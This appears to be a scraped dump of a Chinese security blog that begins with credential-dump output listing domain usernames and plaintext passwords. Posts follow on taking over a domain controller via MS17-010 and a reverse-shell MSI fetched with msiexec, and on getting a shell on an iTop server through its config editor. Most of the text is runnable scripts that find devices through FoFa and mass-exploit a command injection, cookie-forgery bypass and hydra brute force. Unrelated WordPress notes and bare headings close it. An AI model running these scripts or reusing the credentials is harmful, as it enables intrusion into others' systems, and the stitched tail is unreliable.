OBLAST$ CUGAET 7c e4 ed b0 4a 2e 9e 59 a4 d6 79 5d 15 ae e9 70 49 9e ee 82 5a 96 3b 45 fb 2d a5 56 a8 cf 97 b9 c9 8b e4 12 fb 49 d6 d2 a7 6b 81 6c 64 ed 9e dc b8 72 dc 8b 13 34 53 e0 c9 3c f4 3c cc ba ce 20 59 61 be 6a 72 00 fa b2 b8 1f c5 e9 04 64 73 9b ae d8 94 6a 4e 91 40 2d a8 0f 34 64 2b 8d e0 c4 fe 78 45 b9 b0 de 0a 12 fe eb 1f fc b2 73 e5 75 1f 25 e0 88 b4 b1 9e b2 e6 08 77 71 ff 05 af 01 e0 95 c1 54 bf 3d 0f 6a f3 c4 b6 70 5b b2 b4 36 b7 29 28 2e 39 50 a0 1d 5a 28 21 1d 21 a4 4e c7 63 e1 cc 36 14 6c cb 8e bc 76 40 15 26 e3 79 44 bc d2 4f a3 99 7b fa c7 22 2f 8e 0d bf c3 e8 eb e1 43 b7 7e 47 52 1e 10 db 79 4f 32 84 15 9a 68 8b a8 c6 f5 89 f5 70 fc 63 9b e6 cc f4 7c 91 ca c5 dd 3d f7 e6 21 0d 10 c9 23 1a 1d ce 34 55 03
akimova-na CUGAET 123
degur CUGAET specialist
nikolai CUGAET Thor!$go2
slava CUGAET t34ss220

tspkg credentials

Username Domain Password

---

akimova-na CUGAET 123
degur CUGAET specialist
nikolai CUGAET Thor!$go2
slava CUGAET t34ss220

arp -a获取一部分内网ip，提取ip，

route add 192.168.2.1/24 1

添加路由

据上面判断有域
图 0
图 1

ms17-010扫描一波
图 2

域控制器DC，datacenter 存在17-010

dc目标为x86不能直接用msf的17-010，所以通过 admin/smb/ms17_010_command 来执行命令

生成一个msi，然后下载执行，

msfvenom -p windows/meterpreter/reverse_tcp_rc4 lhost=xxxx lport=port rc4password=xxx -f msi > xxx.msi

msf 设置好监听 Exploit: multi/handler windows/meterpreter/reverse_tcp_rc4

设置需要执行的命令

set command msiexec /qn /i http://xxx/xxx.msi

run

至此拿下域Dc，导出域内用户hash

]]> security 目录浏览信息收集域渗透 iTop /archives/security/itop.html

1、弱密码
2、目录浏览
访问站点，随手打个admin，进入
图 0

getshell
网站环境为php，登录以后，发现管理工具里面有个 “编辑配置文件”，可以对配置文件进行编辑，本来打算直接写个一句话到配置文件保存，但是保存不了，后来末尾添加个phpinfo()竟然直接执行了，于是乎，我想使用php写文件到目录看看，bingo，
图 1

执行以后会提示文件大小
因为存在目录浏览，所以可以直接看到新建的文件，然后蚁剑访问
图 2
图 3

查看权限 system 提权都i免了，查看同网段ip
图 4

接下来进行密码搜集和内网拓展
tasklist 没发现杀毒软件，运气好
上传msf执行，收到反弹shell，getuid 是sysytem，hashdump导出hash，load kiwi 查看明文，为空，把hash拿去破解，无果
图 5

arp 扫描主机
run arp_scanner -r 172.x.x.1/24
待续

]]> security iTop FoFa Spider脚本 /archives/security/fofa-spider-sh.html 获取FoFa10000条数据爬虫脚本

下面的脚本可能因为服务端变更，会有报错，
推荐使用 https://github.com/wgpsec/fofa_viewer.git

fofa-spider.sh

用法：

字符串为要搜索的字符串，无须base64。

保存文件名，会自动创建文件夹并存放三个文件，分别为搜索记录，ip文件，ip-port文件

页前数据，只能1000页以内，默认获取ip时间为每条1秒，可以修改sleep等待时间，

#!/bin/bash
#设定cookies
#read -p "fofapro_ars_sessions:" fofapro_ars_session
fofapro_ars_session="xxxxxxxxxxxxxxxxxxxxx"
#获取搜索字符串，并对字符串进行base64
echo -e "\033[33m 搜索的字符串: \033[0m"
read -p  "" search
search_base64=`echo -e "$search\c" | base64 -w 0 -`
echo -e "\033[33m 保存的文件名: \033[0m"
read -p "" filename
mkdir $filename
url1="https://fofa.so/result?qbase64=${search_base64}"
  echo -e "\033[37m url: \033[0m" $url1
echo $search >> $filename/search
echo $url1 >> $filename/search
#获取ip总数
Num=`curl --cookie "_fofapro_ars_session=$fofapro_ars_session" $url1 -s |grep distinct_ips | cut -d ">" -f 2 | cut -d "<" -f 1 | sed "s/,//g"`
  echo -e 共有"\033[33m $Num \033[0m"条数据,每页10个，共"\033[33m $[$Num/10] \033[0m"页"\033[33m $[$Num%10] \033[0m"条
echo -e "\033[33m 获取多少页前数据: \033[0m"
read -p "" end_page
for ((i=1;i<=${end_page};i++))
  do
  echo -e "\033[33m Waite 正在读取第 $i 页数据 \033[0m"
  curl  -s  --cookie "_fofapro_ars_session=$fofapro_ars_session"  "https://fofa.so/result?file=&page=${i}&qbase64=${search_base64}" -o tmp_file
  cat tmp_file | grep target | cut -d "\"" -f 4 |sed "/\(_blank\|#api_info\)/d" | sed "/^$/d">> $filename/$filename-port
  cat tmp_file | grep hosts  |cut -d "\"" -f 2 |cut -d / -f 3 | sed "/^$/d" >> $filename/$filename
  sleep 10
done
exit

检测端口成活可以用masscan，nmap 。http成活和响应可以用whatweb，curl

for i in `cat $FileName`
do
  echo $i
  Status_Code=`curl -m 10 --connect-timeout 10 -o /dev/null -s -w %{http_code} $i/`
  echo $Status_Code
  if ((Status_Code == 200)); then
  whatweb $i/
  echo $i >> $FileName-live
  fi
done
exit

masscan检测端口开放

masscan -p3306 -iL filename | cut -d " " -f 6 > filename-live

]]> security fofa diagnose rce /archives/security/diagnose-rce.html 1.命令注入RCE

漏洞地址 cgimodule=net_diagnose&diagnose_type=0&domain=%7C+COMMAND”

2.认证绕过 cookie伪造

name=admin domain=$random language=0 sessionid=0 path=

3.默认密码

ieee802.11 admin 123456

check.sh
对fofa获取的ip进行针对性成活检测
用法 ./check.sh checkfile 文件中每行一个ip，格式为http://ip

v1.sh
对文本中的目标进行rce检测，并生成rce-ok rce-no 和notfound三个文件
用法 ./v1.sh 状态200文件,文件中每行一个ip，格式为http://ip

对v1.sh处理后，从rce-ok提取的ip进行分类，分为mips，i686,x86_64 ，并为执行特定payload做准备
用法 ./exp.sh filename-rce-ok 每行一个ip，格式为http://ip/{,username,password},需要密码获取cookies的则需要密码，否则不需要

check.sh

#!/bin/bash
mkdir tmp
echo "e.g: ./check.sh  checkfile  "
FileName="$1"
for i in `cat $filename`
do
  url=$i/cgi-bin/snmpManager.cgi?cgimodule=login
  code=$(curl -s -o tmp/checkkk.txt -w %{http_code}  --connect-timeout 1 -m 1 $url)
#  code=$(curl -s -o tmp/checkkk.txt -w %{http_code}  --connect-timeout 0.4 -m 0.5 $url)
  if ((code == 200)) || ((cat tmp/checkkk.txt | grep /black.jpg))  >/dev/null 2>&1 ; then
            echo $i >> $filename-200
            echo  -e "\033[31m $i Success! \033[0m"
            else
              echo $i "Failed!"
          fi
done

v1.sh

#!/bin/bash
#这个版本为可破解web认证版本
rm tmp/*
rm -f hydra.restore
echo "e.g: ./v1.sh  filename  "
FileName="$1"
PassFile="v1pass.txt"
COMMAND=" uname -a"
random=$(cat /dev/urandom | sed "s/[^a-zA-Z0-9]//g" | strings -n 5 | head -n 1)
echo $random
for i in `cat $FileName`
  do
  echo -------------------
  whatweb $i
  url=$i/cgi-bin/snmpManager.cgi
  url_login=${url}?cgimodule=login
  url_rce=${url}?cgimodule=net_diagnose
  cookies_bypass="name=admin domain=$random language=0 sessionid=0  path="
  post_cmd="cgimodule=net_diagnose&diagnose_type=0&domain=%7C"
  post_getdata="cgimodule=ajax_diagnose"
  code_200=`curl -s -o tmp/check.txt -w %{http_code} --connect-timeout 2 -m 5 $url_login`
  if ((code_200 == 200)); then
    if  grep /black.jpg tmp/check.txt >/dev/null 2>&1 ; then
      echo 指纹匹配 ok
      curl -s -o /dev/null --cookie "$cookies_bypass"  -d $post_cmd+id $url_rce
      curl -s -o tmp/exp_log.txt --cookie "$cookies_bypass" -d $post_getdata $url
      if grep uid tmp/exp_log.txt >/dev/null 2>&1 ; then
        echo 执行命令 $COMMAND
        curl -s -o /dev/null --cookie "$cookies_bypass" -d "$post_cmd+$COMMAND" $url_rce
        curl -s --cookie "$cookies_bypass" -d $post_getdata  $url
        echo $i >> $FileName-Rce-OK
        echo " \n "
        else
        echo crack 密码
        echo > tmp/secces.txt
        Username=admin
        rhost=`echo $i | sed 's/http\:\/\///g' | cut -d ":" -f1`
        rport=`echo $i | awk -F ':' '{print $3}'`
        hydra -l $Username -P $PassFile $rhost -s $rport http-post-form "/cgi-bin/snmpManager.cgi:cgimodule=login&username=^USER^&passwd=^PASS^&language=2:black.jpg" -t 1 -f | grep http-post-form | grep password  > tmp/secces.txt
        Password=`cut -d " " -f 11 tmp/secces.txt | sed 's/^[ ]*//'| sed '/^$/d'`
        post_auth="cgimodule=login&username=$Username&passwd=$Password&language=2"
              if [[ -n $Password ]];then
          echo 密码破解成功
          echo "password:" $Password
          curl -s -o /dev/null -m 5  -c tmp/gbcookies.txt -d $post_auth $url_login
          curl -s -o /dev/null -m 5  -b tmp/gbcookies.txt -d $post_cmd+id $url_rce
          curl -s -o tmp/exp_log2.txt -m 5 -b tmp/gbcookies.txt -d $post_getdata $url
          if grep uid tmp/exp_log2.txt >/dev/null 2>&1 ; then
            echo 执行命令 $COMMAND
            curl -s -o /dev/null -m 5 -b tmp/gbcookies.txt -d "$post_cmd+$COMMAND" $url_rce
            curl  -m 5 -b tmp/gbcookies.txt -d $post_getdata $url
            echo -e "\033[33m User:$Username Pass:$Password \033[0m"
            echo $i $Username $Password >> $FileName-Rce-OK
            else
              echo -e "\033[33m User:$Username Pass:$Password But Can't RCE !!\033[0m "
              echo $i $Username $Password >> $FileName-Rce-NO
          fi
          else
            echo -e "\033[33m Password Not Found !!\033[0m "
            echo $i >> $FileName-Password-NotFound
        fi
      fi
    else
          echo "$i failed"
          fi
  fi
 done

exp.sh

#!/bin/bash
#这个版本利用rce-ok文件中ip直接执行命令
echo "e.g: ./exp.sh  filename-rce-ok  "
FileName="$1"
rm -f hydra.restore
PassFile="v1pass.txt"
random=$(cat /dev/urandom | sed "s/[^a-zA-Z0-9]//g" | strings -n 5 | head -n 1)
COMMAND=" uname -a"
post_cmd="cgimodule=net_diagnose&diagnose_type=0&domain=%7C"
post_getdata="cgimodule=ajax_diagnose"
for i in `cat $FileName`
  do
  rhost=`echo $i | awk '{print $1}'`
  Username=`echo $i | awk '{print $2}'`
  Password=`echo $i | awk '{print $3}'`
  echo -------------------
  whatweb $rhost
  url=$rhost/cgi-bin/snmpManager.cgi
  url_login=${url}?cgimodule=login
  url_rce=${url}?cgimodule=net_diagnose
  cookies_bypass="name=admin domain=$random language=0 sessionid=0  path="
  curl -s -o /dev/null --cookie "$cookies_bypass"  -d $post_cmd+id $url_rce
  curl -s -o tmp/exp_log.txt --cookie "$cookies_bypass" -d $post_getdata $url
  if grep uid tmp/exp_log.txt >/dev/null 2>&1 ; then
    echo 执行命令 $COMMAND
    curl -s -o /dev/null --cookie "$cookies_bypass" -d "$post_cmd+$COMMAND" $url_rce
    curl -s -o tmp/rce-data --cookie "$cookies_bypass" -d $post_getdata  $url
    if grep mips tmp/rce-data >/dev/null 2>&1; then
      echo $rhost >> $FileName-rce-mips
      cat tmp/rce-data
      echo "\n"
      elif  grep i686 tmp/rce-data >/dev/null 2>&1; then
        echo $rhost >> $FileName-rce-i686
        cat tmp/rce-data
        echo "\n"
      else
        cat tmp/rce-data
        echo "\n"
        echo $rhost >> $FileName-rce-x86_64
      fi
    else
    post_auth="cgimodule=login&username=$Username&passwd=$Password&language=2"
    echo 执行命令 $COMMAND
    curl -s -o /dev/null -m 5 -c tmp/gbcookies.txt -d $post_auth $url_login
    curl -s -o /dev/null -m 5 -b tmp/gbcookies.txt -d "$post_cmd+$COMMAND" $url_rce
    curl -s -o tmp/rce-data -m 5 -b tmp/gbcookies.txt -d $post_getdata $url
    echo -e "\033[33m User:$Username Pass:$Password \033[0m"
    if grep mips tmp/rce-data >/dev/null 2>&1; then
      echo $rhost >> $FileName-rce-mips
      cat tmp/rce-data
      echo "\n"
      elif  grep i686 tmp/rce-data >/dev/null 2>&1; then
        echo $rhost >> $FileName-rce-i686
        cat tmp/rce-data
        echo "\n"
      else
        cat tmp/rce-data
        echo "\n"
        echo $rhost >> $FileName-rce-x86_64
        fi
  fi
 done

FoFa 搜索语句

"/cgi-bin/snmpManager.cgi"

]]> security rce diagnose Mysql创建wordpress数据库并安装wordpress /archives/web/wordpres-mysql.html mysql创建一个wordpress使用的用户，数据库，并赋予权限的命令

创建用户

create user wordpress@localhost identified by '123456';

创建数据库

create database wordpress;

赋予用户数据库权限

grant all on wordpress.* to 'wordpress'@'localhost' with grant option;

安装
wp-content 给予写入权限，上传图片写入此目录

]]> web wordpress mysql WordPress 使用固定链接404错误 /archives/web/wordpress-404.html 环境 wordpress + apache2 +mysql

一、开启apache2的重写规则

sudo a2enmode rewrite

或者，也可以通过软连接启用 Mod_rewrite 模块（apache默认是加载了的，进入目录执行 ll 可查看）。两者二选一。用指令操作就是：

sudo ln -s /etc/apache2/mods-available/rewrite.load /etc/apache2/mods-enabled/rewrite.load

2、打开apache2配置文件

vim /etc/apache2/apache2.conf

#/var/www/修改为wordpress所在目录
Options Indexes FollowSymLinks
AllowOverride None #None改为ALL不然会apache会忽略wordpress目录中的.htaccess文件
Require all granted

二、wordpress目录添加.htaccess文件

RewriteEngine On
RewriteBase /wordpress/
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /wordpress/index.php [L]

最后

services apache2 restart

后记:

尽量修改网站目录文件拥有者权限为 www
比如linux

chown -R www-data:www-data wordpress/

网站会自己修改.htccess文件

]]> web wordpress 404

🔧 解决方案

步骤 1：关闭 Windows 网络时间同步

步骤 2：修改 VMware 配置文件

2.1 禁用时间同步

2.2 设置固定启动时间

2.3 获取时间戳

步骤 3：创建新快照

⚙️ 高级配置选项

仅禁用特定场景的时间同步

使用 BIOS 时间而非主机时间

禁用 VMware Tools 时间同步

❓ 常见问题

Q1: 修改配置后时间仍然同步怎么办？

Q2: 如何恢复时间同步功能？

Q3: 时间戳计算错误导致时间不对？

Q4: 可以在运行时动态修改时间吗？

Q5: 这个配置会影响性能吗？

💡 使用建议

📌 注意事项

🔗 相关资源

🔐 核心算法原理

1. 文件头验证

2. 密钥数据解密

第一层：XOR 解密

第二层：AES-ECB 解密

PKCS7 去填充

3. 元数据解密

第一层：XOR 解密

第二层：Base64 解码

第三层：AES-ECB 解密

PKCS7 去填充与 JSON 解析

4. 音频数据解密

5. 文件结构偏移

📝 功能使用说明

快速开始

界面功能说明

文件列表区域

进度显示

结果展示

常见问题

✨ 主要特性

1. 单文件分发，零依赖运行

2. 批量解密与目录扫描

3. 歌词文件自动复制

4. 现代化 GUI 界面

5. 完善的错误处理

cloudflare部分

vscode部分

分析浏览器网络请求

根据请求编写python脚本

运行程序

查看结果

制作docker镜像

dockerfile 文件

制作镜像

使用镜像

查看日志

删除 .config/dconf/user 文件中navicat对应 的键值项

通过计划任务自动删除配置文件

手动执行

使用warp 一般我们分为以下几个步骤

安装cloudflare-warp

使用

lisence key获取方法

8.11.0下载地址

安装npm，asar

解压app.asar

修改app/js/background-process.js

Python版本

GO版本

Task

参考

解答

Task

参考

解答

Task

参考

解答

Task

删除 .config/dconf/user 文件中navicat对应的键值项